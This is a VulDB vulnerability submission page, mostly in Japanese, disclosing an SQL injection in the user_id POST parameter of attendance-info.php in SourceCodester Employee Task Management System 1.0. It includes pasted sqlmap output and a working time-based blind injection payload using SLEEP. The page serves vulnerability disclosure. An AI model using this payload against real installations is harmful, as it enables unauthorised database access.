提出 #299164: SourceCodester Employee Task Management System v 1.0 SQL Injection in param user_id in POST attendance-info.php情報

タイトル	SourceCodester Employee Task Management System v 1.0 SQL Injection in param user_id in POST attendance-info.php
説明	SQL Injection in param user_id in POST attendance-info.php [20:19:33] [INFO] POST parameter 'user_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [20:19:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [20:19:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [20:19:44] [INFO] checking if the injection point on POST parameter 'user_id' is a false positive [20:20:37] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between' POST parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests: --- Parameter: user_id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user_id=1' AND (SELECT 5903 FROM (SELECT(SLEEP(5)))hTDS) AND 'gCuQ'='gCuQ&add_punch_in= --- [20:21:13] [INFO] the back-end DBMS is MySQL [20:21:13] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y web application technology: Apache 2.4.54, PHP 7.4.30 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
ソース	⚠️ https://github.com/tht1997/WhiteBox/blob/main/sourcecodesters/employee-management-system-php-attendance-info.md
ユーザー	huutuanbg97 (UID 45015)
送信	2024年03月15日 14:34 (2 年 ago)
モデレーション	2024年03月16日 07:14 (17 hours later)
ステータス	承諾済み
VulDBエントリ	257055 [SourceCodester Employee Task Management System 1.0 attendance-info.php user_id SQLインジェクション]
ポイント	20

◂ 前概要次 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!